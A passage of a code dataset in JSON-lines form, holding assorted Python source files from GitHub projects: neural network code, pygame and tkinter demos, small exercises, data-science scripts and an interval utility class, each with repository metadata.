for i in range(1,segments+1):\n start=self.window_size-self.edge_len+(i-1)*self.inner_len\n end=self.window_size-self.edge_len+(i-1)*self.inner_len+self.window_size\n end=min(end,L)\n x_next=x[:,start:end]\n mask_next=attention_mask[:,start:end]\n x_next=self.backbone(x_next,attention_mask=mask_next,return_dict=False)[0]\n #L_next=x_next.shape[1]-self.edge_len,\n if i==segments:\n x_next=x_next[:,self.edge_len:]\n else:\n x_next=x_next[:,self.edge_len:self.edge_len+self.inner_len]\n #print(x_next.shape)\n x_new=torch.cat([x_new,x_next],1)\n x=x_new\n #print(start,end)\n #print(x.shape)\n if return_transformer_hidden_states:\n transformer_hidden_states=x\n\n # print(x.shape)\n # exit()\n\n # x=torch.cat([x,discourse_type_ids],-1)\n # x=self.downsample(x)\n\n #x=self.lstm(x)\n\n #x=self.classification_head(x).squeeze(-1)\n\n pooled_outputs=[]\n if return_vectors:\n vectors=[]\n for i in range(len(x)):\n #n_discourses=gather_indices[i].max()+1\n # unique_gather_indices=torch.unique_consecutive(gather_indices[i])\n # unique_gather_indices=unique_gather_indices[unique_gather_indices!=-1]\n #\n # #print(unique_gather_indices)\n #\n # for j in unique_gather_indices:\n n_discourses=gather_indices[i].max()+1\n tmp=[]\n for j in range(n_discourses):\n\n\n vector=x[i][gather_indices[i]==j]\n if return_vectors:\n vectors.append(self.classification_head(vector))\n mean_vector=vector.mean(0)\n #max_vector,_=vector.max(0)\n # print(max_vector)\n # exit()\n #pooled=torch.cat([mean_vector,max_vector],-1)\n #pooled=mean_vector\n tmp.append(mean_vector)\n #pooled_outputs.append(pooled)\n tmp=torch.stack(tmp)\n tmp=self.lstm(tmp.unsqueeze(0))\n pooled_outputs.append(tmp.squeeze(0))\n\n\n #exit()\n pooled_outputs=torch.cat(pooled_outputs)\n x=pooled_outputs\n x=self.classification_head(x).squeeze(-1)\n\n\n # if return_vectors:\n # vectors=torch.stack(vectors,0)\n # vectors=self.classification_head(vectors)\n\n #seq_mask=(sequence_ids==0)\n\n #sum_L=(x*seq_mask.unsqueeze(-1)).sum(1)\n #sum_mask=seq_mask.sum(1)\n\n # print(sum_L.shape)\n # print(sum_mask.shape)\n # exit()\n\n\n #pooled=sum_L/sum_mask.unsqueeze(-1)\n\n\n\n #x=self.classification_head(x)\n else:\n transformer_hidden_states=input_ids\n x=self.lstm(transformer_hidden_states)\n x=self.classification_head(x)\n\n if return_vectors:\n return x,vectors\n else:\n return x\n\n # if return_transformer_hidden_states:\n # return x, transformer_hidden_states\n # else:\n # return x#, BIO_output\n","repo_name":"Shujun-He/TeamSKT-Feedback-Prize---Predicting-Effective-Arguments-2nd-Place-solution","sub_path":"Shujun_solution/src/Feedback_Prize/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"11002892185","text":"import cv2\nimport os\n\nclass frameExtractor:\n def __init__(self, video_path, write_path):\n self.cap = cv2.VideoCapture(str(video_path))\n self.write_path = str(write_path)\n\n def showVideo(self, frame_interval=50):\n frame_count = 29500\n while(self.cap.isOpened()):\n ret, frame = self.cap.read()\n if ret == True:\n frame_count += 1\n if frame_count % frame_interval == 0:\n image_name = \"{:05d}.jpg\".format(int(frame_count / frame_interval))\n print(os.path.join(self.write_path, image_name))\n cv2.imwrite(os.path.join(self.write_path, image_name), frame)\n frame = cv2.resize(frame, (0, 0), None, fx = 0.5, fy = 0.4)\n cv2.imshow(\"Frame\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n self.cap.release()\n cv2.destroyAllWindows()\n\ndef main():\n extract = frameExtractor(\"datasets/bag_upright.mp4\", \"/home/hari/cement/datasets/images\")\n extract.showVideo()\n\nif __name__ == \"__main__\":\n main()","repo_name":"jagennath-hari/ConveyorVision-Bag-Counter","sub_path":"scripts/frame_extractor.py","file_name":"frame_extractor.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41623597914","text":"\nimport pygame\nimport sys\nfrom mi_class_Imagen import Imagen\n\npygame.init()\n#constantes\nANCHO_PANTALLA = 800\nALTO_PANTALLA = 500\nTITULO_JUEGO = \"Mi Juego Pygame\"\n\nBLANCO = (255, 255, 255)\nNEGRO = (0, 0, 0)\nROJO = (255, 0, 0)\nVERDE = (0, 255, 0)\nAZUL = (0, 0, 255)\nAZUL_CLARO = (0, 150, 255)\nAMARILLO = (255, 255, 0)\n\nPANTALLA = pygame.display.set_mode((ANCHO_PANTALLA, ALTO_PANTALLA))\n\n\npygame.display.set_caption(TITULO_JUEGO)\n\n\nFPS = 30\nRelog = pygame.time.Clock() \n\n#******** objeto creado con la class Imagen - VERSION POO\ncolor_vertical = {\"color_inicial\" : VERDE, \"color_colision\" : ROJO}\ncolor_horizontal = {\"color_inicial\" : AZUL_CLARO, \"color_colision\" : BLANCO}\n\nimagen_vertical = Imagen((100, 100), color_vertical, (ANCHO_PANTALLA/2 ,ALTO_PANTALLA/2))\nimagen_horizontal = Imagen((100, 100), color_horizontal, (ANCHO_PANTALLA -100, ALTO_PANTALLA/2))\n#******************************************\n\n\nwhile(True):\n Relog.tick(FPS)\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n \n PANTALLA.fill(NEGRO)\n PANTALLA.blit(imagen_vertical.superficie, imagen_vertical.rectangulo) \n PANTALLA.blit(imagen_horizontal.superficie, imagen_horizontal.rectangulo)\n \n #**************** movimiento VERSION POO\n imagen_vertical.mover_imagen(\"vertical\", 10, (ANCHO_PANTALLA, ALTO_PANTALLA))\n imagen_horizontal.mover_imagen(\"horizontal\", 10, (ANCHO_PANTALLA, ALTO_PANTALLA))\n #***************************************\n \n #******************verificamos si un rectangulo colisiona con otro rectangulo- VERSION POO\n imagen_horizontal.detectar_colicion(imagen_vertical)\n #***************************************\n \n \n \n pygame.draw.line(PANTALLA, AZUL, (400, 0), (400, 800), 1)\n pygame.draw.line(PANTALLA, AZUL, (0, 250), (800, 250), 1)\n \n # pygame.display.update()# esta función se utiliza para actualizar una parte específica de la pantalla.\n pygame.display.flip()# se utiliza para actualizar toda la pantalla\n \n \n \n","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"11-pygame/cursada_pygame/5-lo anterior a POO.py","file_name":"5-lo anterior a POO.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13271891040","text":"import tkinter as tk\nfrom tkinter import ttk\nimport TakePhoto as tp\nimport cv2\nimport PIL\nfrom PIL import ImageTk\nfrom PIL import Image\nimport Cartoon\nimport Paint\nimport Sketch\nimport os\n\nclass GUI():\n def __init__(self, master):\n self.tphoto = tp.TakePhoto(\"Screenshot\")\n self.tphoto.vid()\n self.photo = cv2.imread(\"./Screenshot.jpeg\")\n self.h, self.w, self.c = self.photo.shape\n \n self.imagePanel = tk.Frame(master)\n self.imagePanel.grid(row=0, column=0)\n \n \n self.controlPanel = tk.Frame(master)\n self.controlPanel.grid(row=0, column=1)\n \n \n self.imageP(self.h,self.w)\n self.ctrlP(self.h/2, 200, 0, 0, 0)\n self.ctrlP(self.h/2, 200, 0, 1, 1)\n \n \n def imageP(self,height, width):\n self.frame = tk.Frame(self.imagePanel, border = 8)\n self.frame.grid(row=0, column=0)\n self.canvas = tk.Canvas(self.frame,width=width, height=height, borderwidth=0, highlightthickness=0, bg=\"grey\")\n \n self.canvas.pack()\n self.photo = ImageTk.PhotoImage(Image.open(\"./Screenshot.jpeg\"))\n self.canvas.create_image(0,0, anchor=\"nw\", image=self.photo)\n \n def ctrlP(self, height, width, col, row, version):\n self.frame = tk.Frame(self.controlPanel, border = 8)\n self.frame.grid(row=row, column=col)\n self.cp = tk.Frame(self.frame, width=width, height=height)\n self.cp.pack()\n if version == 1:\n self.createButtons()\n else:\n self.createCbox()\n \n def createButtons(self):\n self.label1 = tk.Label(self.cp, text=\"Do you have a picture you \\nwant to manipulate? \\ntype in the directory \"\n \"here!\")\n self.label1.place(relx=0.5, rely=0.1, anchor=\"center\")\n\n self.tBox = tk.Text(self.cp, bg=\"white\", height=1, width=20)\n self.tBox.place(relx=0.5, rely=0.3, anchor=\"center\")\n\n self.loadImageButton = tk.Button(self.cp, text=\"LoadImage\")\n self.loadImageButton[\"command\"] = self.loadImageButtonPressed\n self.loadImageButton.place(relx=0.5, rely=0.4, anchor=\"center\")\n\n self.takePhotoButton = tk.Button(self.cp, text=\"Re-take Photo\")\n self.takePhotoButton[\"command\"] = self.takePhoto\n self.takePhotoButton.place(relx=0.5, rely=0.8, anchor=\"center\")\n\n\n\n \n \n def createCbox(self):\n self.label2 = tk.Label(self.cp, text=\"Choose the picture style!\")\n self.label2.place(relx=0.5, rely=0.1, anchor=\"center\")\n self.comboBox = ttk.Combobox(self.cp, textvariable=tk.StringVar())\n self.comboBox['values'] = ('Original', 'Cartoon', 'Sketch', 'Paint')\n self.comboBox.current(0)\n self.comboBox.place(relx=0.5, rely=0.2, anchor=\"center\")\n \n self.changeButton = tk.Button(self.cp, text=\"Change Style\")\n self.changeButton[\"command\"] = self.changeButtonPressed\n self.changeButton.place(relx=0.5, rely=0.5, anchor=\"center\")\n \n def takePhoto(self):\n self.tphoto.vid()\n self.changeImage(\"Screenshot\")\n \n def changeImage(self, photoName):\n for image in self.canvas.winfo_children():\n image.destroy()\n \n self.newPhoto = ImageTk.PhotoImage(Image.open(\"./\"+photoName+\".jpeg\"))\n self.canvas.create_image(0,0, anchor=\"nw\", image=self.newPhoto)\n \n def changeButtonPressed(self):\n boxStr = self.comboBox.get()\n \n if boxStr == \"Original\":\n self.changeImage(\"Screenshot\")\n elif boxStr == \"Paint\":\n paint = Paint.Paint()\n paint.createImage()\n self.changeImage(\"Paint\")\n elif boxStr == \"Sketch\":\n sketch = Sketch.Sketch()\n sketch.createImage()\n self.changeImage(\"Sketch\")\n else:\n cart = Cartoon.Cartoon()\n cart.createImage()\n self.changeImage(\"Cartoon\")\n \n \n def loadImageButtonPressed(self):\n txtStr = self.tBox.get(1.0, tk.END+\"-1c\")\n if os.path.isfile(txtStr):\n if txtStr[-4:] == \"jpeg\" or txtStr[-3] == \"jpg\":\n img = cv2.imread(txtStr)\n cv2.imwrite(\"./Screenshot.jpeg\", img)\n self.changeImage(\"Screenshot\")\n else:\n self.labelWarning = tk.Label(self.cp, text=\"This software only supports jpeg or jpg type\")\n self.labelWarning.place(relx=0.5, rely=0.5, anchor=\"center\")\n else:\n self.labelWarning = tk.Label(self.cp, text=\"Directory entered does not exist\")\n self.labelWarning.place(relx=0.5, rely=0.5, anchor=\"center\")\n\n\n\n","repo_name":"ryuoda123/PhotoManipulation","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72023994087","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef simulate_dice_rolls(num_rolls):\r\n # Simula el lanzamiento de dos dados y devuelve la suma de los resultados\r\n dice_rolls = np.random.randint(1, 7, size=(num_rolls, 2))\r\n sum_of_rolls = np.sum(dice_rolls, axis=1)\r\n return sum_of_rolls\r\n\r\ndef plot_gaussian_distribution(data):\r\n # Crea un histograma y ajusta una curva de campana de Gauss\r\n plt.hist(data, bins=range(2, 14), density=True, alpha=0.6, color='g')\r\n \r\n mu, sigma = np.mean(data), np.std(data)\r\n x = np.linspace(2, 13, 100)\r\n y = (1 / (sigma * np.sqrt(2 * np.pi))) * np.exp(-0.5 * ((x - mu) / sigma)**2)\r\n \r\n plt.plot(x, y, '--', color='b')\r\n plt.title('Distribución de la Suma de Dos Dados')\r\n plt.xlabel('Suma de los Dados')\r\n plt.ylabel('Frecuencia Normalizada')\r\n plt.show()\r\n\r\n# Simula 10000 lanzamientos de dos dados\r\nnum_simulations = 10000\r\ndice_sum_results = simulate_dice_rolls(num_simulations)\r\n\r\n# Representa los resultados en una campana de Gauss\r\nplot_gaussian_distribution(dice_sum_results)\r\n","repo_name":"frappefactible/Factible-framework","sub_path":"campana de gauss prueba 1 cgp.py","file_name":"campana de gauss prueba 1 cgp.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37151142094","text":"import streamlit as st\nimport filters\nimport pandas as pd\nimport config\n\n\ndef display(options):\n if not config.get_materialization_complete():\n st.info(\"Please wait for materialization to complete before running reports.\")\n st.button(\n \"Refresh Status\",\n on_click=config.refresh,\n key=\"refresh-materialization-status\",\n )\n return\n\n credit_cost = config.get_compute_credit_cost()\n\n df = pd.DataFrame(list(options.keys()), columns=[\"tab\"])\n report = st.selectbox(\"Select Report\", df, index=0)\n\n st.title(report)\n filter_container = st.expander(\"Filters\", expanded=False)\n st.container()\n\n filter_values = filters.display(filter_container)\n if filter_values.valid():\n\n with st.spinner(f\"\"\"Loading {report} Report\"\"\"):\n options[report](filter_values, credit_cost)\n","repo_name":"sundeck-io/OpsCenter","sub_path":"app/ui/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"31122585783","text":"my_foods = [ 'pizza', 'falafel', 'carrot cake']\nfriends_food = my_foods[:]\n\nmy_foods.append('cannoli')\nfriends_food.append('ice cream')\n\nprint ('My favourite foods are:')\nfor food in my_foods [:]:\n\tprint (food.title())\n\nprint('My friends foods are:')\nfor foodfriend in friends_food[:]:\n\tprint (foodfriend.title())\n\n","repo_name":"StephanieLoomans/learning_python","sub_path":"myfoods_loops.py","file_name":"myfoods_loops.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37456726094","text":"# 내적\n# https://programmers.co.kr/learn/courses/30/lessons/70128\n\n# 주어진 a와 b 리스트 각각 index에 대응하는 수들을 곱해준다음, 이 수를 모두 더해주는 방식\n\ndef solution(a, b):\n answer = 0\n for i in range(len(a)):\n answer += a[i] * b[i]\n return answer\n\nprint(solution([1, 2, 3, 4], [-3, -1, 0, 2]))\nprint(solution([-1, 0, 1], [1, 0, -1]))","repo_name":"dueytree/Algorithm_test","sub_path":"dot_product.py","file_name":"dot_product.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15150804999","text":"# models for predict the gols\r\n'''\r\n 1 option --> Predict the total gols (Regresion)\r\n features --> DTO, Time, HomeTeam, AwayTeam, Referee\r\n \r\n 2 option --> Predict if total gols +- 2.5 (Classifier)\r\n'''\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom datasets_the_goals import df_2\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression, SGDClassifier\r\nfrom sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, accuracy_score, recall_score, confusion_matrix\r\n\r\ndef label_encoder(data):\r\n data[['Time','HomeTeam','AwayTeam','Referee']] = data[['Time','HomeTeam','AwayTeam','Referee']].apply(LabelEncoder().fit_transform) \r\n return data\r\n\r\ndef split_the_data(data, test_size):\r\n x = data.drop('TG', axis=1)\r\n y = data['TG']\r\n return train_test_split(x, y, test_size=test_size, random_state=10)\r\n\r\ndef standard_x(x_train, x_test):\r\n scaler = StandardScaler().fit(x_train)\r\n x_train = scaler.fit_transform(x_train)\r\n x_test = scaler.fit_transform(x_test)\r\n \r\ndef predict(model, x_train, x_test, y_train, y_test):\r\n model.fit(x_train, y_train)\r\n y_pred = model.predict(x_test)\r\n acc = accuracy_score(y_test, y_pred)\r\n print(acc)\r\n\r\ndef metrics(y_test, y_pred):\r\n mse = np.sqrt(mean_squared_error(y_pred, y_test))\r\n abs = mean_absolute_error(y_pred, y_test)\r\n acc = accuracy_score(y_test, y_pred)\r\n rec = recall_score(y_test, y_pred)\r\n confusion_matrix_ = confusion_matrix(y_test, y_pred)\r\n\r\nopa = np.array([10,0,13,0,2.5,2.5,2.333,5.333]).reshape(-1,1)\r\n\r\ndf_1_LE = label_encoder(df_2)\r\nx_train, x_test, y_train, y_test = split_the_data(df_1_LE, 0.25)\r\nstandard_x(x_train, x_test)\r\npredict(DecisionTreeClassifier(max_depth=4), x_train, x_test, y_train, y_test)\r\n","repo_name":"lgomesgl/Predict_gols","sub_path":"predict_the_goals.py","file_name":"predict_the_goals.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36126951446","text":"from bisect import bisect, insort\nfrom .common import memoize\n\nclass Interval(object):\n \"\"\"\n Represents an interval of time defined by two timestamps.\n\n Parameters:\n -----------\n\n start: float.\n Starting value.\n end : float\n Ending value.\n \"\"\"\n\n __slots__ = (\"start\", \"end\")\n\n def __init__(self, start, end):\n if end < start:\n raise ValueError(\"End timestamp:{end} cannot be less than start timestamp:{start}\".format(start=start, end=end))\n self.start, self.end = float(start), float(end)\n\n def __repr__(self):\n return \"Interval(start={:.3f}ms, end={:.3f}ms, duration={:.3f}ms)\".format(\n self.start * 1000, self.end * 1000, self.duration * 1000)\n\n @property\n def duration(self):\n \"\"\"Returns float\"\"\"\n return self.end - self.start\n\n @memoize\n def within(self, timestamp):\n \"\"\"Returns true if timestamp falls within interval\"\"\"\n return True if (timestamp >= self.start) and \\\n (timestamp <= self.end) else False\n\n\nclass IntervalList(list):\n \"\"\"\n List with objects with intervals, sorted and sliceable by interval.\n \"\"\"\n \n def __init__(self, iterable=None):\n self._intervals = []\n self._start_timestamps = []\n self._end_timestamps = []\n if iterable:\n for item in iterable:\n if hasattr(item, 'interval'):\n self.append(item)\n else:\n raise AttributeError('{} object has no attribute `interval`'.format(type(item)))\n\n def __repr__(self):\n return '\\n'.join([item.__repr__() for item in self])\n\n @property\n def _start_times(self):\n return self._start_timestamps\n\n @property\n def _end_times(self):\n return self._end_timestamps\n\n @property\n def duration(self):\n \"\"\"Duration of events in seconds\"\"\"\n return sum(interval.duration for interval in self._intervals)\n\n def __add_interval(self, obj):\n \"\"\"Add interval to (sorted) intervals list\"\"\"\n start, end = obj.interval.start, obj.interval.end\n idx = bisect(self._start_timestamps, start)\n insort(self._end_timestamps, end)\n self._start_timestamps.insert(idx, start) # insert into self based on start\n self._intervals.insert(idx, obj.interval)\n return idx\n\n def append(self, obj):\n \"\"\"Append new event to list\"\"\"\n try:\n obj.interval\n except AttributeError:\n raise TypeError(\"Must have interval attribute\")\n super(self.__class__, self).insert(self.__add_interval(obj), obj)\n\n def slice(self, interval, trimmed=True):\n \"\"\"\n Returns list of objects whose interval fall\n between the specified interval.\n\n Parameters:\n -----------\n trimmed : bool, default True\n Trim interval of returned list of objects to fall within specified\n interval\n \"\"\"\n if interval is None:\n return self\n\n start, end = interval.start, interval.end\n idx_left = bisect(self._start_timestamps, start)\n idx_right = bisect(self._start_timestamps, end)\n idx_left = idx_left - 1 if idx_left >= len(self) else idx_left\n idx_right = None if idx_right > len(self) else idx_right\n idx = slice(idx_left, idx_right) if idx_left != idx_right else slice(idx_left - 1, idx_left)\n\n ll = self[idx]\n rv = IntervalList()\n \n if trimmed and len(ll):\n for item in ll:\n trim = False\n item_start, item_end = item.interval.start, item.interval.end\n if item_start < start:\n trim, item_start = True, start\n if item_end > end:\n trim, item_end = True, end\n if trim:\n rv.append(item._replace(interval=Interval(item_start, item_end)))\n else:\n rv.append(item)\n\n return rv","repo_name":"corakwue/ftrace","sub_path":"ftrace/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"41318231912","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn import tree\n\ndf = pd.read_csv(\"salaries.csv\")\nprint(df.head())\n\ninput = df.drop('salary_more_then_100k',axis=1)\n\ntarget = df['salary_more_then_100k']\n\nle_company = LabelEncoder()\nle_job = LabelEncoder()\nle_degree = LabelEncoder()\n\ninput['company_n'] = le_company.fit_transform(input['company'])\ninput['job_n'] = le_job.fit_transform(input['job'])\ninput['degree_n'] = le_degree.fit_transform(input['degree'])\n\ninput_n = input.drop(['company','job','degree'],axis='columns')\n\nmodel = tree.DecisionTreeClassifier()\nmodel.fit(input_n,target)\nprint(model.score(input_n,target))\n\nresult = model.predict([[0,0,2]])\nprint(result)","repo_name":"sivasaraa/scikit-ML","sub_path":"salary-DT.py","file_name":"salary-DT.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72085544487","text":"from itertools import permutations\r\nimport itertools\r\n\r\nclass Command:\r\n op = None\r\n minX = maxX = minY = maxY = minZ = maxZ = None\r\n\r\n def __init__(self, op, minX, maxX, minY, maxY, minZ, maxZ) -> None:\r\n self.op = op\r\n self.minX = minX\r\n self.maxX = maxX\r\n self.minY = minY\r\n self.maxY = maxY\r\n self.minZ = minZ\r\n self.maxZ = maxZ\r\n \r\n def get_cubes(self):\r\n x = range(self.minX, self.maxX+1)\r\n y = range(self.minY, self.maxY+1)\r\n z = range(self.minZ, self.maxZ+1)\r\n s = set()\r\n for dx in x:\r\n for dy in y:\r\n for dz in z:\r\n s.add((dx,dy,dz))\r\n return s\r\n \r\n def __repr__(self) -> str:\r\n return f'{self.op} x={self.minX}..{self.maxX}, y={self.minY}..{self.maxY}, z={self.minZ}..{self.maxZ}'\r\n\r\ndef run_command(command, s):\r\n if command.op == 'on':\r\n s = s.union(command.get_cubes())\r\n else:\r\n s = s.difference(command.get_cubes())\r\n return s\r\n\r\ndef main():\r\n input = [line.strip() for line in open('input.txt', 'r')]\r\n\r\n commands = []\r\n for line in input:\r\n op = line.split()[0]\r\n minX, maxX = line.split(' ')[1].split(',')[0].split('=')[1].split('..')\r\n minY, maxY = line.split(',')[1].split('=')[1].split('..')\r\n minZ, maxZ = line.split(',')[2].split('=')[1].split('..')\r\n c = Command(op, int(minX), int(maxX), int(minY), int(maxY), int(minZ), int(maxZ))\r\n commands.append(c)\r\n\r\n s = set([])\r\n for command in commands:\r\n if command.minX >= -50 and command.maxX <= 50 and command.minY >= -50 and command.maxY <= 50 and command.minZ >= -50 and command.maxZ <= 50: \r\n s = run_command(command, s)\r\n print(len(s))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"GMainardi/Advent-2021","sub_path":"22/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31562193611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nmain \r\n\r\n\r\n\"\"\"\r\n\r\nimport asyncio\r\nimport websockets\r\n\r\n\r\nfrom functions import *\r\n\r\nif __name__ == '__main__':\r\n \r\n \r\n\r\n port = 8088 \r\n print(\"Starting server on {}...\".format(get_ip()) + 'oon port:' + str(port))\r\n \r\n \r\n loop = asyncio.get_event_loop()\r\n\r\n \r\n\r\n\r\n \r\n watch_server = loop.run_until_complete(websockets.serve(watch, '0.0.0.0', port))\r\n try:\r\n loop.run_forever()\r\n except KeyboardInterrupt:\r\n print(\"\\nBye bye...\")\r\n\r\n watch_server.close()\r\n loop.run_until_complete(watch_server.wait_closed())\r\n \r\n \r\n","repo_name":"nikinicole/Stream_HR_HRV_Tizen","sub_path":"get_galaxy_data.py","file_name":"get_galaxy_data.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73537635367","text":"import pygame, sys\nfrom pygame.locals import *\n\n# Create the constants (go ahead and experiment with different values)\nBOARDWIDTH = 4 # number of columns in the board\nBOARDHEIGHT = 4 # number of rows in the board\nTILESIZE = 80\nWINDOWWIDTH = 640\nWINDOWHEIGHT = 480\nFPS = 30\nBLANK = None\n\n# set up the colors\nBLACK = ( 0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nBLUE = ( 0, 25, 255)\n\npygame.init()\nDISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT),0,32)\ntext = pygame.font.Font(\"..\\..\\\\resource\\QinYuanJ.TTF\",25)\ntext_fmt = text.render(\"进程已结束,退出代码\",1,BLACK)\n\ntext_matrics = text.metrics(\"你\")\ntext_matrics1 = text.metrics(\"吗\")\nprint(text.size(\"你\"))\nprint(text_fmt.get_width())\nprint(text_fmt.get_size())\n\n# draw on the surface object\nDISPLAYSURF.fill(BLUE)\nDISPLAYSURF.blit(text_fmt,(100,100))\npygame.display.set_caption('Hello Pygame World!')\n\n'''\n\n'''\ndef getTextByPositon(text, font, beginPos):\n\n wordWidths = []\n for word in text:\n wordWidths.append(font.size(word)[0])\n\n wordHeight = font.size(word)[1]\n mouseX, mouseY = pygame.mouse.get_pos()\n if beginPos[1] < mouseY and beginPos[1] + wordHeight > mouseY:\n totalLength = 0\n for i in range(len(wordWidths)):\n totalLength += wordWidths[i]\n if totalLength + beginPos[0] > mouseX:\n return text[i]\n return \"\"\n\n\ndef getTextListByArea(text, font, textPos, beginPos, endPos):\n\n wordWidths = []\n for word in text:\n wordWidths.append(font.size(word)[0])\n wordHeight = font.size(word)[1]\n\n beginIndex = -1\n endIndex = -1\n beginSelPos = 0\n endSelPos = 0\n if (textPos[1] < beginPos[1] and textPos[1] + wordHeight > beginPos[1]) \\\n and (textPos[1] < endPos[1] and textPos[1] + wordHeight > endPos[1]):\n totalLength = 0\n for i in range(len(wordWidths)):\n totalLength += wordWidths[i]\n if totalLength + textPos[0] > beginPos[0] and beginIndex == -1:\n beginIndex = i\n beginSelPos = totalLength - wordWidths[i]\n if totalLength + textPos[0] > endPos[0] and endIndex == -1:\n endIndex = i + 1\n endSelPos = totalLength + textPos[0]\n\n if endIndex >= len(text):\n endIndex = len(text)\n\n if beginIndex > -1 and endIndex > -1:\n return text[beginIndex:endIndex], beginSelPos, endSelPos\n return '',0,0\n\n\ndef getSelectTextPos(text, font, beginPos):\n pass\n\n\nbeginPos = ()\nendPos = ()\nwhile True: # main game loop\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_LEFT:\n text_new = text.render(\"程已结束,退\",1,RED)\n DISPLAYSURF.blit(text_new,(125,100))\n if event.key == K_RIGHT:\n text_new = text.render(\"程已结束,退\",1,BLACK)\n DISPLAYSURF.blit(text_new,(125,100))\n elif event.type == MOUSEBUTTONDOWN:\n beginPos = pygame.mouse.get_pos()\n elif event.type == MOUSEBUTTONUP:\n endPos = pygame.mouse.get_pos()\n #selectText = getTextByPositon(\"进程已结束,退出代码\",text,(100,100))\n #print(selectText)\n if len(beginPos) > 0 and len(endPos) > 0:\n selText, beginPos, endPos = getTextListByArea(\"进程已结束,退出代码\",\n text,(100,100),beginPos,endPos)\n if len(selText) > 0:\n print(selText)\n text_new = text.render(selText, 1, RED)\n DISPLAYSURF.blit(text_new, (beginPos + 100, 100))\n beginPos = ()\n endPos = ()\n\n\n\n\n\n\n # 获得鼠标位置\n x, y = pygame.mouse.get_pos()\n\n\n\n pygame.display.update()","repo_name":"haizhiship/myMathProject","sub_path":"src/try/fontTry.py","file_name":"fontTry.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41203767036","text":"#!/usr/bin/env python\n\"\"\"\nThe Scripts is used to calculate GQS for single locus or given multiple locus.\n\"\"\"\n## import libraries\nimport argparse\nimport sys\nimport pandas as pd\nimport numpy as np\nimport os\nimport re\nimport subprocess\nparser=argparse.ArgumentParser()\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nfrom contextlib import suppress\nimport datetime\n\n## fixed parameters\nq1=0.68;q2=0.95;q3=0.99\nnth=5\ncrit_cord=[(0.4,1),(1, 0.4)]\n##\n\nTODAY_YMD = datetime.datetime.today().strftime(\"Date: %Y-%m-%d \\nTime: %H:%M:%S\\n\")\n__version__ = '1.0.1'\nDEFHEAD = \"************************************************\\n\"\nDEFHEAD += \"* Genomic Quality Score (GQS)\\n\"\nDEFHEAD += \"* Version {V}\\n\".format(V=__version__)\nDEFHEAD += \"* Created by Swapnil Awasthi\\n\"\nDEFHEAD += \"***********************************************\\n\"\nDEFHEAD += TODAY_YMD\nDEFHEAD += \"***********************************************\\n\"\n\nparser=argparse.ArgumentParser(description=__doc__)\nparser.add_argument('--ifile', default=None, type=str, help=\"Input filename (single/sumstats)\")\nparser.add_argument('--regs', default=None, type=str, help=\"Defined regions (with these columns in this order CHR,START and END)\")\nparser.add_argument('--r2_th', default=0.0, type=float,help=\"SNPs below this LD will be excluded from the analysis (Default:0.0)\")\nparser.add_argument('--chrm', default=None, type=str, help=\"Chromosome number\")\nparser.add_argument('--chrm_h',default=None, type=str, help=\"Column name for the chromosome in the input file\")\nparser.add_argument('--pval_h',default=None, type=str, help=\"Column name for the Pvalue in the input file\")\nparser.add_argument('--snp_h', default=None, type=str, help=\"Column name for the SNP identifier in the input file\")\nparser.add_argument('--pos_h', default=None, type=str, 